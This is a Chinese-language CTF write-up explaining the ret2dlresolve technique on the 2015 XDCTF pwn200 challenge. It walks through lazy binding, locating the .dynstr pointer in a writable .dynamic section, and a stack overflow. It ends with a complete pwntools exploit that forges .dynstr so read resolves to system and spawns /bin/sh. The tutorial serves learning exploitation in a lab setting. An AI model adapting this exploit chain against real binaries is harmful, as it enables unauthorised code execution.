简介

关于ret2dlresolve利用的原理，可以参考如下博文：
https://www.freebuf.com/articles/system/170661.html

ret2dlsolve的核心原理就是利用了延迟绑定技术，linux在加载ELF可执行文件的时候，包含的动态链接文件里的符号，并不会直接把这些符号的实际地址加载到内存中，而是会使用PLT + GOT 表来实现延迟绑定，简单说就是在第一次用到动态链接文件里的符号的时候才会去寻找符号的实际位置然后保存下来，下次使用的时候就可以直接访问了，关于延迟绑定可以参考如下博客：
http://rickgray.me/2015/08/07/use-gdb-to-study-got-and-plt/

题目链接

https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow/ret2dlresolve/2015-xdctf-pwn200

分析

我们以上述题目作为示例来演示分析一下ret2dlsolve的利用流程，题目的解析可同步参考如下博文：
https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/advanced-rop/ret2dlresolve/#roputil

no-relro-32

我们先分析一个最简单的示例——32位的no relro的可执行文件，对应题目目录的 32/no-relro/main_no_relro_32 文件

首先经过第一部分的学习，可以了解到延迟绑定需要用到动态链接相关的信息，这些信息在ELF格式的文件中可以通过.dynamic节来获取到，.dynamic节中存放了动态链接相关的节区的地址，可以通过访问.dynamic来获取到需要的内容所在节区的首地址，然后跳转到对应节区再获取需要的内容，.dynamic节的内容如下：

readelf -d main_no_relro_32

红框圈出来的两个节区，第一个是STRTAB类型的，对应的是ELF文件里的dynstr节，存放了动态链接文件的符号名的字符串；第二个是SYMTAB类型的，对应的是dynsym节，存放了动态链接符号表：

readelf -S main_no_relro_32

在本题中，因为没有开启relro，dynamic节是可读写的，因此我们的攻击思路为：将dynstr节的内容复制到一段可读写的内存中，然后将read字符串替换为system字符串，再把dynamic节中表示dynstr节的地址修改为我们新建的dynstr节所在的内存，这样在延迟绑定执行时获取read符号的名字时，因为是按照偏移获取，实际获取到的符号名就是system，然后调用read实际就是调用的system，然后我们把 /bin/sh 字符串写入到一段可读写内存中，把这段内存的地址作为参数传给system即可获取到shell。

为了实现上述思路，我们首先要找一段可读写的内存，使用gdb调试该程序，打开vmmap，我们发现bss段所在的内存是可读写的，因此我们可以直接把伪造的dynstr节和 /bin/sh 字符串放进bss段中：

找到可读写的内存后，我们需要分析一下dynamic节的内容，找到dynstr地址的存放位置并替换成我们需要的。linux中32位ELF文件的dynamic节每一项的值是存放在Elf32_Dyn结构体中的：

typedef struct {Elf32_Sword d_tag;union {Elf32_Word d_val;Elf32_Addr d_ptr;} d_un;
} Elf32_Dyn;

dynmaic节中就是存放了若干个上述结构体，因此每一项内容都会占用8字节内存，我们查看本题的dynamic节的成员：

发现dynstr是第9个成员，dynamic节的首地址为：0x080497c4，因此dynstr成员的首地址为：0x80497c4 + 8*8 = 0x8049804，这个地址对应的是Elf32_Dyn结构体的第一个成员，占用了4字节大小，dynstr节的地址存放在第二个成员里，地址为：0x8049804 + 4 = 0x8049808

或者直接用Ghidra分析dynamic节，可以明显看到存放dynstr节的地址的内存地址是多少：

拿到了bss段地址和dynamic中存放dynstr节的成员地址后，下一步就是分析溢出点和溢出值，这一步直接用Ghidra，很简单：

从main函数开始逐步分析，发现溢出点在vuln函数中，字符数组local_70的大小为104字节，但read函数从标准输入中读入了0x100字节，会造成溢出，结合gdb分析，可以发现读入112字节后，正好到vuln函数的返回地址处，也就是112 + addr就可以返回到addr指定的位置。

在本题，我们选择的是替换read为system，而read函数在我们构造rop链的过程中已经调用过了，因此构造好dynstr后，需要重新跳转到read函数第一次调用进入的流程，也就是重新走一次延迟绑定的流程，才能让我们的read函数绑定为system函数，因此rop链最后调用system函数的地方，不能直接返回read函数的plt地址，要返回延迟绑定流程的地址，这个地址我们直接使用gdb分析read函数第一次调用的位置可以看到：

第一次调用read函数，read@plt地址0x8048370会跳转到GOT表的0x80498c8地址，该地址的当前内容指向0x8048376地址，也就是延迟绑定的流程，执行完延迟绑定后，GOT地址0x80498c8里存放的值变成了read函数的实际位置：

因此，我们rop链如果想重新绑定read函数的地址，将其指向system函数，就不能直接返回到read@plt地址0x8048370，这样会直接跳转到read函数，而是需要返回到read函数指向延迟绑定流程的地址，也就是上面看到的0x8048376

经过上述分析我们拿到了可读写的地址、存放dynstr地址信息的成员的地址、read函数执行延迟绑定的地址0x8048376、payload的最大长度0x100以及溢出长度112，现在可以构造exp了，完整的exp如下：

from pwn import *elf = ELF("./main_no_relro_32") # 读取待攻击的二进制文件的内容，主要是为了获取dynstr节的内容
rop = ROP("./main_no_relro_32") # 获取目标二进制文件中可利用的gadgets，构造ROP攻击链offset = 112 # 溢出112字节后开始覆盖返回地址
rop.raw(offset*'a') # 溢出至返回地址
dynstr_addr = 0x8049804 + 4 # dynamic中存放的dynstr节地址信息的成员的地址
bss_addr = 0x80498e0 # bss段的起始地址，用于存放伪造的dynstr
str_addr = 0x80498e0 + 0x100 # 存放/bin/sh字符串的地址, dynstr的长度必须小于0x100，因为payload的长度不能超过0x100
read_addr = 0x8048376 # read函数第一次调用时，走延迟绑定的流程起始地址rop.read(0, dynstr_addr, 4) # 调用read函数，覆盖掉dynamic中存放的dynstr节的地址，覆盖的值从标准输入读入, 长度为4字节
dynstr = elf.get_section_by_name('.dynstr').data() # 从目标文件中读取原始的dynstr节的内容
dynstr = dynstr.replace(b'read', b'system') # 将原始节中的read字符串替换为system，构造伪造的dynstr节，这里也可以选择其他用到的动态链接符号，比如write
rop.read(0, bss_addr, len(dynstr)) # 将伪造的dynstr写入到bss段, 从标准输入中获取伪造的dynstr的值
rop.read(0, str_addr, len("/bin/sh\x00")) # 将 /bin/sh 字符串写入到bss段, 从标准输入中获取字符串
rop.raw(read_addr) # 重新跳转到首次调用read函数的流程，这次使用的是伪造的dynstr, 因此执行完延迟绑定后实际调用的函数为system
rop.raw(0xdeadbeef) # 填充字符串
rop.raw(str_addr) # system函数的参数，也就是 /bin/sh 字符串的地址assert(len(rop.chain())<=256) # rop链的长度不能大于0x100p = process("./main_no_relro_32") # 启动目标二进制文件
p.recvuntil('Welcome to XDCTF2015~!\n') # 执行到溢出点
p.send(rop.chain()) # 发送rop链
p.send(p32(bss_addr)) # 覆盖dynstr的地址为伪造的dynstr地址
p.send(dynstr) # 写入伪造的dynstr
p.send("/bin/sh\x00") # 写入system函数使用的参数
p.interactive()

执行上述exp即可获取到shell！